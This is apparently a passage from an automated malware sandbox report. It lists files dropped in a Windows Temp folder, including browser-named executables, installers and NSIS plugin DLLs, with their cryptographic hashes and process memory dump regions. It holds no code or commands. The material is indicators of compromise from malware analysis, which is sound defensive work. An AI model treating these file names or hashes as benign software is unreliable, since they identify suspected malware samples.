C:\Users\Admin\AppData\Local\Temp\chrome2.exe
MD5
10c590b273b00b642bd2b8bd791fd0fd

SHA1
9556d27a9a66fc354123539bb39e9595ad8657e3

SHA256
7d93c79d1ea56168cfce5d72d16082a095b0cea6a039bb96b0223887cb84a009

SHA512
e6685357cb661c0c4dadeaa80a0f8ef4f91168567d242f86f376e8508d045db8af92c00a499a1116f6c6f6b22913f6ed464ce4e8c97c8e04674ca08389e3090e

Download Submit
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
MD5
ab4d6ea29ab62215a2ad3db1f70133e1

SHA1
d9bfe78a044dcc0a8b2c6f6ba0dd3052d04ed8b5

SHA256
5d2f6c820fa51ea398e9cf861480558375754ea9b52b6ea03c8c99fe22fe9f11

SHA512
24217f87a184a50fbca9918b790362a0c8608c4fa6f1f8fa2d7cac1ec23f4bd20033f86bb211eea2091058d74361324b1a89e8f1aed3ca2c81ecb59b45393710

Download Submit
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
MD5
ab4d6ea29ab62215a2ad3db1f70133e1

SHA1
d9bfe78a044dcc0a8b2c6f6ba0dd3052d04ed8b5

SHA256
5d2f6c820fa51ea398e9cf861480558375754ea9b52b6ea03c8c99fe22fe9f11

SHA512
24217f87a184a50fbca9918b790362a0c8608c4fa6f1f8fa2d7cac1ec23f4bd20033f86bb211eea2091058d74361324b1a89e8f1aed3ca2c81ecb59b45393710

Download Submit
C:\Users\Admin\AppData\Local\Temp\chrome4.exe
MD5
e87347942970a88da4e62f86de76137a

SHA1
7c31556bc803366c75d32aaf1bdf3e9549de29fc

SHA256
a88c3ab56d96b0e5605ba048bc4c82283828af6633df30a0c209a682a493fb58

SHA512
35d0114e51f40abb0aaaf98255342a7b18465737ebbaee379fe227a1dfeca1536c5cf6b114d95db4214f57b717d24a48c5e3e1834cb620c7b45e75c23caa55a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\chrome4.exe
MD5
e87347942970a88da4e62f86de76137a

SHA1
7c31556bc803366c75d32aaf1bdf3e9549de29fc

SHA256
a88c3ab56d96b0e5605ba048bc4c82283828af6633df30a0c209a682a493fb58

SHA512
35d0114e51f40abb0aaaf98255342a7b18465737ebbaee379fe227a1dfeca1536c5cf6b114d95db4214f57b717d24a48c5e3e1834cb620c7b45e75c23caa55a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\chrome5.exe
MD5
89f2d59efbd5980b486d047e804c9c9c

SHA1
6874052471714fce731752204f9099df5933f000

SHA256
7d89a2bcc21ea72160e32114495c98f8d23e9102235f9cfb1a9191a1e8ef39d5

SHA512
dba63617f2066a6caf372473ddbefc318e6f89d8055b0e07c97cd43922c6def4fafe09d03cea84285bfd4a522c4982f6a0bd00b5a4708f7072dd5f1261c84dd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\chrome5.exe
MD5
89f2d59efbd5980b486d047e804c9c9c

SHA1
6874052471714fce731752204f9099df5933f000

SHA256
7d89a2bcc21ea72160e32114495c98f8d23e9102235f9cfb1a9191a1e8ef39d5

SHA512
dba63617f2066a6caf372473ddbefc318e6f89d8055b0e07c97cd43922c6def4fafe09d03cea84285bfd4a522c4982f6a0bd00b5a4708f7072dd5f1261c84dd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\inst1.exe
MD5
e5f9bcffdde599dd66c729fe2868e411

SHA1
2990ab84be3b99e687ced6c25c9548c3a0757e25

SHA256
c5099f6b446fcc8fd368148b66879910466a02f84d2975467a43a0e4cac11fe8

SHA512
7965c1b0828835adb171ac2a8a5938fd175aefce43353eb29d124e9cb5e324376c3f6e74528c8e066b3ee67f08bff06b5cbd9072772986713360423276e8a8fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\inst1.exe
MD5
e5f9bcffdde599dd66c729fe2868e411

SHA1
2990ab84be3b99e687ced6c25c9548c3a0757e25

SHA256
c5099f6b446fcc8fd368148b66879910466a02f84d2975467a43a0e4cac11fe8

SHA512
7965c1b0828835adb171ac2a8a5938fd175aefce43353eb29d124e9cb5e324376c3f6e74528c8e066b3ee67f08bff06b5cbd9072772986713360423276e8a8fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
MD5
dd3f5335f760b949760b02aac1187694

SHA1
f53535bb3093caef66890688e6c214bcb4c51ef9

SHA256
90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26

SHA512
e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004

Download Submit
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
MD5
dd3f5335f760b949760b02aac1187694

SHA1
f53535bb3093caef66890688e6c214bcb4c51ef9

SHA256
90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26

SHA512
e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss6C46.tmp\INetC.dll
MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss6C46.tmp\INetC.dll
MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss6C46.tmp\INetC.dll
MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss6C46.tmp\INetC.dll
MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss6C46.tmp\INetC.dll
MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss6C46.tmp\INetC.dll
MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss6C46.tmp\System.dll
MD5
fbe295e5a1acfbd0a6271898f885fe6a

SHA1
d6d205922e61635472efb13c2bb92c9ac6cb96da

SHA256
a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

SHA512
2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

Download Submit
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
MD5
dd3f5335f760b949760b02aac1187694

SHA1
f53535bb3093caef66890688e6c214bcb4c51ef9

SHA256
90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26

SHA512
e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004

Download Submit
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
MD5
dd3f5335f760b949760b02aac1187694

SHA1
f53535bb3093caef66890688e6c214bcb4c51ef9

SHA256
90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26

SHA512
e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
MD5
40f4e15145a6255c64dd81449f3ebdc0

SHA1
2e9d5df8e76f53c236af982c9a37ab1d02f3c8ad

SHA256
8cff6da34c39da2859dbd247c9215de8944ba8c9e40caf0fe0c6b5d9db48a806

SHA512
ca5c9f466765906bfa3d84066304dd198fced04440fb7bead6efb3eb70f0b4aab9ec74a2a203b2ffc5fef05cfc53ed3143a13d002d4234efca063a08e6deffbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
MD5
40f4e15145a6255c64dd81449f3ebdc0

SHA1
2e9d5df8e76f53c236af982c9a37ab1d02f3c8ad

SHA256
8cff6da34c39da2859dbd247c9215de8944ba8c9e40caf0fe0c6b5d9db48a806

SHA512
ca5c9f466765906bfa3d84066304dd198fced04440fb7bead6efb3eb70f0b4aab9ec74a2a203b2ffc5fef05cfc53ed3143a13d002d4234efca063a08e6deffbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\sqlite.dat
MD5
7f4f8a68a9537b665604d005485b5655

SHA1
febfcce866af399d08c654b382a8946142cdbe76

SHA256
18e6e7fe1adb493e19a876bd161242a67a790b810b660cb27f1dc404b553b231

SHA512
e89522e3d901ec7cd4fe7ec40454730802e7c35988023d730e1fba9a02023ee19911496c51f8e7fad30e532d420460a2c546df39de78657a0308761719dd37fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\sqlite.dll
MD5
e7232d152ca0bf8e9e69cfbe11b231f6

SHA1
9c00ea3d8b2ccfb24b9fbd1772944ea26b5bb0f5

SHA256
dd19804b5823cf2cab3afe4a386b427d9016e2673e82e0f030e4cff74ef73ce1

SHA512
3d87325fbea81b4559d435725e58670222d12478bdbc10dd97033c6f3e06314de89b7b5fa27881a9020a0395fa861c5e992f61f99b3271c4ac7e8616bd0d3bbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\sqlite.dll
MD5
e7232d152ca0bf8e9e69cfbe11b231f6

SHA1
9c00ea3d8b2ccfb24b9fbd1772944ea26b5bb0f5

SHA256
dd19804b5823cf2cab3afe4a386b427d9016e2673e82e0f030e4cff74ef73ce1

SHA512
3d87325fbea81b4559d435725e58670222d12478bdbc10dd97033c6f3e06314de89b7b5fa27881a9020a0395fa861c5e992f61f99b3271c4ac7e8616bd0d3bbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\yangjuan-game.exe
MD5
058a556e487e905e46fc83332b7eef90

SHA1
a0bcaa89842a012d8d9d5665485c16989598716e

SHA256
5cde61ced88b7d559bec83458381d34bc976463059f9712c429c4f8f7c9dbf7a

SHA512
2e3908e0fe50914573f10dadb1c30dcacedaac063b4d8354a3be46c910d83979623ebfdefaa51ffded5cc58860413e72e088a68d2ee08284029766ddab58c0e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\yangjuan-game.exe
MD5
058a556e487e905e46fc83332b7eef90

SHA1
a0bcaa89842a012d8d9d5665485c16989598716e

SHA256
5cde61ced88b7d559bec83458381d34bc976463059f9712c429c4f8f7c9dbf7a

SHA512
2e3908e0fe50914573f10dadb1c30dcacedaac063b4d8354a3be46c910d83979623ebfdefaa51ffded5cc58860413e72e088a68d2ee08284029766ddab58c0e9

Download Submit
memory/1512-190-0x00000000033C8000-0x0000000003444000-memory.dmp

Filesize
496KB

Download
memory/1512-193-0x0000000004F60000-0x0000000005035000-memory.dmp

Filesize
852KB

Download
memory/1512-192-0x00000000033C8000-0x0000000003444000-memory.dmp

Filesize
496KB

Download
memory/1512-197-0x0000000000400000-0x0000000003296000-memory.dmp

Filesize
46.6MB

Download
memory/1672-211-0x00000000035B7000-0x00000000035DE000-memory.dmp

Filesize
156KB

Download
memory/1672-200-0x00000000035B7000-0x00000000035DE000-memory.dmp

Filesize
156KB

Download
memory/1672-218-0x0000000000400000-0x0000000003241000-memory.dmp

Filesize
46.3MB

Download
memory/1672-212-0x00000000033A0000-0x00000000033E3000-memory.dmp

Filesize
268KB

Download
memory/1792-130-0x0000000000540000-0x0000000000548000-memory.dmp

Filesize
32KB

Download
memory/1792-132-0x000000001C770000-0x000000001C772000-memory.dmp

Filesize
8KB

Download
memory/1792-131-0x00007FFF38300000-0x00007FFF38DC1000-memory.dmp

Filesize
10.8MB

Download
memory/2028-226-0x00007FFF33510000-0x00007FFF33A7F000-memory.dmp

Filesize
5.4MB

Download
memory/2148-238-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2148-240-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2148-239-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2156-183-0x00007FFF37D40000-0x00007FFF38801000-memory.dmp

Filesize
10.8MB

Download
memory/2156-184-0x0000000000FF0000-0x0000000000FF2000-memory.dmp

Filesize
8KB

Download
memory/2156-176-0x0000000000810000-0x0000000000818000-memory.dmp

Filesize
32KB

Download
memory/2380-162-0x000000001C840000-0x000000001C842000-memory.dmp

Filesize
8KB

Download
memory/2380-142-0x00000000005E0000-0x0000000000620000-memory.dmp

Filesize
256KB

Download
memory/2380-149-0x00007FFF37D40000-0x00007FFF38801000-memory.dmp

Filesize
10.8MB

Download
memory/2668-135-0x00000000009E0000-0x0000000000FC4000-memory.dmp

Filesize
5.9MB

Download
memory/2668-136-0x0000000074760000-0x0000000074F10000-memory.dmp

Filesize
7.7MB

Download
memory/2692-151-0x0000000000690000-0x00000000006A2000-memory.dmp

Filesize
72KB

Download
memory/2692-150-0x0000000000550000-0x0000000000560000-memory.dmp

Filesize
64KB

Download
memory/2928-182-0x000000001C7F0000-0x000000001C7F2000-memory.dmp

Filesize
8KB

Download
memory/2928-180-0x00007FFF37D40000-0x00007FFF38801000-memory.dmp

Filesize
10.8MB

Download
memory/2928-173-0x00000000004C0000-0x00000000004C8000-memory.dmp

Filesize
32KB

Download
memory/3536-236-0x0000026F3EB83000-0x0000026F3EB85000-memory.dmp

Filesize
8KB

Download
memory/3536-235-0x0000026F3EB80000-0x0000026F3EB82000-memory.dmp

Filesize
8KB

Download
memory/3536-234-0x00007FFF37D40000-0x00007FFF38801000-memory.dmp

Filesize
10.8MB

Download
memory/3536-237-0x0000026F3EB86000-0x0000026F3EB87000-memory.dmp

Filesize
4KB

Download
memory/3712-231-0x000002AD40690000-0x000002AD406A2000-memory.dmp

Filesize
72KB

Download
memory/3712-230-0x000002AD5A620000-0x000002AD5A622000-memory.dmp

Filesize
8KB

Download
memory/3712-228-0x000002AD3E7B0000-0x000002AD3E9D0000-memory.dmp

Filesize
2.1MB

Download
memory/3712-229-0x00007FFF37D40000-0x00007FFF38801000-memory.dmp

Filesize
10.8MB

Download
memory/3712-233-0x000002AD5A626000-0x000002AD5A627000-memory.dmp

Filesize
4KB

Download
memory/3712-232-0x000002AD5A623000-0x000002AD5A625000-memory.dmp

Filesize
8KB

Download
memory/4584-161-0x00007FFF37D40000-0x00007FFF38801000-memory.dmp

Filesize
10.8MB

Download
memory/4584-154-0x0000000000490000-0x0000000000498000-memory.dmp

Filesize
32KB

Download
memory/4584-163-0x0000000002380000-0x0000000002382000-memory.dmp

Filesize
8KB

Download
memory/4656-243-0x00000115C3190000-0x00000115C3192000-memory.dmp

Filesize
8KB

Download
memory/4656-241-0x00000115C1720000-0x00000115C1726000-memory.dmp

Filesize
24KB

Download
memory/4656-242-0x00007FFF37D40000-0x00007FFF38801000-memory.dmp

Filesize
10.8MB

Download
memory/4656-244-0x00000115C3193000-0x00000115C3195000-memory.dmp

Filesize
8KB

Download
memory/4656-245-0x00000115C3196000-0x00000115C3197000-memory.dmp

Filesize
4KB

Download
memory/4680-146-0x000000001CE00000-0x000000001CE02000-memory.dmp

Filesize
8KB

Download
memory/4680-139-0x0000000000BF0000-0x0000000000BF8000-memory.dmp

Filesize
32KB

Download
memory/4680-145-0x00007FFF37D40000-0x00007FFF38801000-memory.dmp

Filesize
10.8MB

Download
memory/4764-181-0x000000001C840000-0x000000001C842000-memory.dmp

Filesize
8KB

Download
memory/4764-177-0x00007FFF37D40000-0x00007FFF38801000-memory.dmp

Filesize
10.8MB

Download
memory/4764-169-0x0000000000600000-0x0000000000608000-memory.dmp

Filesize
32KB

Download